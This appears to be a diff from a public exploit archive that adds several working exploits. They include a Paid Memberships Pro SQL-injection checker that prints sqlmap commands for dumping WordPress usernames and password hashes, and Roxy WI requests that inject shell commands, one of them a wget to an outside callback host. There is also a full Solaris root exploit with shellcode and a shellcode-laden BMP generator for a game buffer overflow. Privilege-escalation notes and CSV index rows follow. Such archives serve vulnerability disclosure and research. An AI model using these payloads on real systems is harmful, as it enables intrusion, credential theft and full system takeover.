# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
#
# Running this script against a WordPress instance with Paid Membership Pro plugin
# tells you if the target is vulnerable.
# As the SQL injection technique required to exploit it is Time-based blind, instead of
# trying to directly exploit the vuln, it will generate the appropriate sqlmap command
# to dump the whole database (probably very time-consuming) or specific chose data like
# usernames and passwords.
#
# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress
import sys
import requests
def get_request(target_url, delay="1"):
payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"
data = {'rest_route': '/pmpro/v1/order',
'code': payload}
return requests.get(target_url, params=data).elapsed.total_seconds()
print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')
if len(sys.argv) != 2:
print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))
print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))
sys.exit(1)
target_url = sys.argv[1]
try:
print('[-] Testing if the target is vulnerable...')
req = requests.get(target_url, timeout=15)
except:
print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))
sys.exit(2)
if get_request(target_url, "1") >= get_request(target_url, "2"):
print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))
sys.exit(3)
print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))
print('\n[+] You can dump the whole WordPress database with:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))
print('\n[+] To dump data from specific tables:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))
print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))
sys.exit(0)

31
exploits/python/webapps/51226.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31125
# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: https://192.168.56.114
Dnt: 1
Referer: https://192.168.56.114/app/login.py
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
alert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45

27
exploits/python/webapps/51227.txt Normal file
View file

@ -0,0 +1,27 @@
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31126
# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Origin: https://192.168.56.116
Referer: https://192.168.56.116/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;

27
exploits/python/webapps/51228.txt Normal file
View file

@ -0,0 +1,27 @@
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.1.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31161
# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.56.116
Referer: https://192.168.56.116/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;

397
exploits/solaris/local/51209.c Normal file
View file

@ -0,0 +1,397 @@
/*
* Exploit Title: Solaris 10 libXm - Buffer overflow Local privilege escalation
* raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE
* Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "What has been will be again,
* what has been done will be done again;
* there is nothing new under the Sun."
* -- Ecclesiastes 1:9
*
* #Solaris #CDE #0day #ForeverDay #WontFix
*
* This exploit illustrates yet another way to abuse the infamous dtprintinfo
* binary distributed with the Common Desktop Environment (CDE), a veritable
* treasure trove for bug hunters since the 1990s. It's not the most reliable
* exploit I've ever written, but I'm quite proud of the new vulnerabilities
* I've unearthed in dtprintinfo with the latest Solaris patches (CPU January
* 2021) applied. The exploit chain is structured as follows:
* 1. Inject a fake printer via the printer injection bug I found in lpstat.
* 2. Exploit the stack-based buffer overflow I found in libXm ParseColors().
* 3. Enjoy root privileges!
*
* For additional details on my bug hunting journey and on the vulnerabilities
* themselves, you can refer to the official advisory:
* https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt
*
* Usage:
* $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall
* $ ./raptor_dtprintlibXmas 10.0.0.109:0
* raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE
* Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Using SI_PLATFORM : i86pc (5.10)
* Using stack base : 0x8047fff
* Using safe address : 0x8045790
* Using rwx_mem address : 0xfeffa004
* Using sc address : 0x8047fb4
* Using sprintf() address : 0xfefd1250
* Path of target binary : /usr/dt/bin/dtprintinfo
*
* On your X11 server:
* 1. Select the "fnord" printer, then click on "Selected" > "Properties".
* 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu.
*
* Back to your original shell:
* # id
* uid=0(root) gid=1(other)
*
* IMPORTANT NOTE.
* The buffer overflow corrupts some critical variables in memory, which we
* need to fix. In order to do so, we must patch the hostile buffer at some
* fixed locations with the first argument of the last call to ParseColors().
* The easiest way to get such a safe address is via the special 0x41414141
* command-line argument and truss, as follows:
* $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT
* $ grep ParseColors OUT | tail -1
* 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724)
* ^^^^^^^^^ << this is the safe address we need
*
* Tested on:
* SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021)
* [previous Solaris versions are also likely vulnerable]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE"
#define INFO2 "Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
#define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging
#define BUFSIZE 1106 // size of hostile buffer
#define PADDING 1 // hostile buffer padding
#define SAFE 0x08045770 // 1st arg to ParseColors()
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */
/* triple setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_bad(int addr, char *name);
int get_env_addr(char *path, char **argv);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], cmd[1024], *vuln = VULN;
char platform[256], release[256], display[256];
int i, sc_addr, safe_addr = SAFE;
FILE *fp;
int sb = ((int)argv[0] | 0xfff); // stack base
int ret = search_ldso("sprintf"); // sprintf() in ld.so.1
int rwx_mem = search_rwx_mem(); // rwx memory
/* helper that prints argv[0] address, used by get_env_addr() */
if (!strcmp(argv[0], arg[0])) {
printf("0x%p\n", argv[0]);
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if ((argc < 2) || (argc > 3)) {
fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n",
argv[0]);
exit(1);
}
snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]);
if (argc > 2) {
safe_addr = (int)strtoul(argv[2], (char **)NULL, 0);
}
/* enter debug mode */
if (safe_addr == 0x41414141) {
unlink(DEBUG);
snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG);
if (system(cmd) == -1) {
perror("error creating debug binary");
exit(1);
}
vuln = DEBUG;
}
/* fill envp while keeping padding */
add_env("LPDEST=fnord"); // injected printer
add_env("HOME=/tmp"); // home directory
add_env("PATH=/usr/bin:/bin"); // path
sc_addr = add_env(display); // x11 display
add_env(sc); // shellcode
add_env(NULL);
/* calculate shellcode address */
sc_addr += get_env_addr(vuln, argv);
/* inject a fake printer */
unlink("/tmp/.printers");
unlink("/tmp/.printers.new");
if (!(fp = fopen("/tmp/.printers", "w"))) {
perror("error injecting a fake printer");
exit(1);
}
fprintf(fp, "fnord :\n");
fclose(fp);
link("/tmp/.printers", "/tmp/.printers.new");
/* craft the hostile buffer */
bzero(buf, sizeof(buf));
for (i = PADDING; i < BUFSIZE - 16; i += 4) {
set_val(buf, i, ret); // sprintf()
set_val(buf, i += 4, rwx_mem); // saved eip
set_val(buf, i += 4, rwx_mem); // 1st arg
set_val(buf, i += 4, sc_addr); // 2nd arg
}
memcpy(buf, "\"c c ", 5); // beginning of hostile buffer
buf[912] = ' '; // string separator
set_val(buf, 1037, safe_addr); // safe address
set_val(buf, 1065, safe_addr); // safe address
set_val(buf, 1073, 0xffffffff); // -1
/* create the hostile XPM icon files */
system("rm -fr /tmp/.dt");
mkdir("/tmp/.dt", 0755);
mkdir("/tmp/.dt/icons", 0755);
if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) {
perror("error creating XPM icon files");
exit(1);
}
fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf);
fclose(fp);
link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm");
link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret);
fprintf(stderr, "Path of target binary\t: %s\n\n", vuln);
/* check for badchars */
check_bad(safe_addr, "safe address");
check_bad(rwx_mem, "rwx_mem address");
check_bad(sc_addr, "sc address");
check_bad(ret, "sprintf() address");
/* run the vulnerable program */
execve(vuln, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_bad(): check an address for the presence of badchars
*/
void check_bad(int addr, char *name)
{
int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP
for (i = 0; i < sizeof(bad) / sizeof(int); i++) {
if (((addr & 0xff) == bad[i]) ||
((addr & 0xff00) == bad[i]) ||
((addr & 0xff0000) == bad[i]) ||
((addr & 0xff000000) == bad[i])) {
fprintf(stderr, "error: %s contains a badchar\n", name);
exit(1);
}
}
}
/*
* get_env_addr(): get environment address using a helper program
*/
int get_env_addr(char *path, char **argv)
{
char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char hex[11];
int fd[2], addr;
/* truncate program name at correct length and create a hard link */
prog[strlen(path)] = '\0';
unlink(prog);
link(argv[0], prog);
/* open pipe to read program output */
if (pipe(fd) == -1) {
perror("pipe");
exit(1);
}
switch(fork()) {
case -1: /* cannot fork */
perror("fork");
exit(1);
case 0: /* child */
dup2(fd[1], 1);
close(fd[0]);
close(fd[1]);
execve(prog, arg, env);
perror("execve");
exit(1);
default: /* parent */
close(fd[1]);
read(fd[0], hex, sizeof(hex));
break;
}
/* check address */
if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
fprintf(stderr, "error: cannot read address from helper\n");
exit(1);
}
return addr + strlen(arg[0]) + 1;
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NUL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer (little endian)
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0x000000ff);
buf[pos + 1] = (val & 0x0000ff00) >> 8;
buf[pos + 2] = (val & 0x00ff0000) >> 16;
buf[pos + 3] = (val & 0xff000000) >> 24;
}

41
exploits/windows/local/51203.txt Normal file
View file

@ -0,0 +1,41 @@
## Title: Windows 11 10.0.22000 - Backup service Privilege Escalation
## Author: nu11secur1ty
## Date: 01.13.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/software-download/windows11
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752
## Description:
Windows 11 Pro build 10.0.22000 Build 22000 suffers from Backup
service - Privilege Escalation vulnerability.
An attacker who successfully exploited this vulnerability could gain
SYSTEM privileges.
and could delete data that could include data that results in the
service being unavailable.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752)
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)
## Proof and Exploit:
[href](https://streamable.com/f2dl3m)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html https://0day.today/
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

28
exploits/windows/local/51206.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path
# Date: 2023/01/17
# Exploit Author : Wim Jaap van Vliet
# Vendor Homepage: www.clevo.com.tw
# Software Link: https://enstrong.blob.core.windows.net/en-driver/PDXXPNX1/Others/CC30_1006.zip
# Version: 2.1.0.6
# Tested on: Windows 11 Pro 10.0.22000
# Exploit
The Hotkey Clipboard Service 'HKClipSvc', installed as part of Control Center3.0 v3.97 (and earlier versions) by Clevo has a unquoted service path.
This software package is usually installed on Clevo laptops (or other brands using Clevo barebones) as a driver.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system.
# Information
C:\>sc qc "HKClipSvc"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HKClipSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HotKey Clipboard Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

48
exploits/windows/local/51210.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path
# Exploit Author: Laguin Benjamin (MONK-MODE)
# Discovery Date: 2023-19-01
# Vendor Homepage: https://personifyinc.com/
# Software Link: https://personifyinc.com/download/chromacam
# Tested Version: Chromacam-4.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 x64
# CVE: In progress
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Personify Frame Transformer PsyFrameGrabberService C:\Program Files
(x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe Auto
C:\>sc qc "PsyFrameGrabberService"
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: PsyFrameGrabberService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files
(x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Personify Frame Transformer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-1000
OS Name: Microsoft Windows 10 Professionnel
OS Version: 10.0.19044 N/A build 19044
# Exploit
If an attacker had already compromised the system and the current user has
the privileges to write in the : C:\Program Files (x86)\ "C:\Program Files
(x86)\Personify" "C:\Program Files (x86)\Personify\ChromaCam" "C:\Program
Files (x86)\Personify\ChromaCam\64" folder or in "C:\" , he could place his
own "Program.exe" or "PsyFrameGrabberService.exe" files respectively, and
when the service starts, it would launch the malicious file, rather than
the original "PsyFrameGrabberService.exe".
The service starts automatically at bood and runs in system

24
exploits/windows/local/51212.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2023-01-18
# Vendor : Microsoft
# Version : 15.02.1118.007
# Tested on OS: Microsoft Exchange Server 2019 CU12
#PoC :
==============
C:\>sc qc MSExchangeADTopology
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: MSExchangeADTopology
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : Microsoft Exchange Active Directory Topology
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem
           

52
exploits/windows/local/51223.py Executable file
View file

@ -0,0 +1,52 @@
# Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow
# Exploit Date: 22.01.2023
# Discovered and Written by: Knursoft
# Vendor Homepage: https://www.rockstargames.com/
# Version: v1.1
# Tested on: Windows XP SP2/SP3, 7, 10 21H2
# CVE : N/A
#1 - Run this python script to generate "evil.bmp" file.
#2 - Copy it to [Your Game Path]\skins.
#3 - Launch the game and navigate to Options > Player Setup and choose skin
"evil".
#4 - Buffer Overflow occurs and calc.exe pops up!
#msfvenom -p windows/exec CMD="calc.exe"
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
buf += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"
buf += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
buf += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
buf += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
buf += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65"
buf += b"\x00"
#any shellcode should work, as it seems there is no badchars
ver = 0 #set to 1 if you want it to work on GTA III steam version
esp = b"\xb9\xc5\x14\x21" #mss32.dll jmp esp
bmphdr =
b"\x42\x4D\x36\x00\x03\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00"
#generic bmp header
payload = bmphdr
payload += b"\x90" * 1026
if ver == 1:
payload += b"\x90" * 112
payload += esp
payload += b"\x90" * 20 #padding
payload += buf
with open("evil.bmp", "wb") as poc:
poc.write(payload)

36
files_exploits.csv
View file

@ -3802,6 +3802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,,2016-11-08,2016-11-08,0,,,,,,
24494,exploits/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",remote,hardware,23,2013-02-14,2016-08-03,1,,"Metasploit Framework (MSF)",,,,http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf
35925,exploits/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",remote,hardware,,2011-07-05,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/48560/info
51158,exploits/hardware/remote/51158.txt,"ProLink PRS1841 PLDT Home fiber - Default Password",2023-03-31,"Lawrence Amer",remote,hardware,,2023-03-31,2023-04-03,0,,,,,,
32469,exploits/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",remote,hardware,,2008-10-09,2014-03-24,1,CVE-2008-5869;OSVDB-51260,,,,,https://www.securityfocus.com/bid/31666/info
36503,exploits/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",remote,hardware,9993,2015-03-26,2015-03-26,0,CVE-2014-7910;OSVDB-112004;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-3671;CVE-2014-3659,"Metasploit Framework (MSF)",,,,https://github.com/d3vpp/metasploit-modules
36504,exploits/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",remote,hardware,,2015-03-26,2015-03-26,0,CVE-2014-7910;OSVDB-112004;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-3671;CVE-2014-3659,"Metasploit Framework (MSF)",,,,https://github.com/d3vpp/metasploit-modules
@ -5453,6 +5454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,,2018-05-10,2018-05-10,0,CVE-2018-10832,,,,http://www.exploit-db.comModbusPal.jar,
32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",webapps,java,,2008-11-09,2014-03-29,1,OSVDB-49752;OSVDB-105626,,,,,https://www.securityfocus.com/bid/32208/info
38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,,2012-12-13,2017-05-12,1,,,,,,https://www.securityfocus.com/bid/56933/info
51205,exploits/java/webapps/51205.py,"Nacos 2.0.3 - Access Control vulnerability",2023-04-03,"Jenson Zhao",webapps,java,,2023-04-03,2023-04-03,0,CVE-2021-43116,,,,,
49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,,2021-03-29,2021-03-29,0,,,,,,
26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",webapps,java,,2005-07-15,2013-06-07,1,CVE-2005-2276;OSVDB-18064,,,,,https://www.securityfocus.com/bid/14310/info
32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java,,2009-04-15,2019-03-28,1,CVE-2009-1294;OSVDB-53937,,,,,https://www.securityfocus.com/bid/34531/info
@ -7617,6 +7619,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27057,exploits/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",local,linux,,2006-01-09,2013-07-24,1,CVE-2005-4158;OSVDB-20764,,,,,https://www.securityfocus.com/bid/16184/info
21420,exploits/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,local,linux,,2001-11-01,2012-09-21,1,CVE-2002-0184;OSVDB-5344,,,,,https://www.securityfocus.com/bid/4593/info
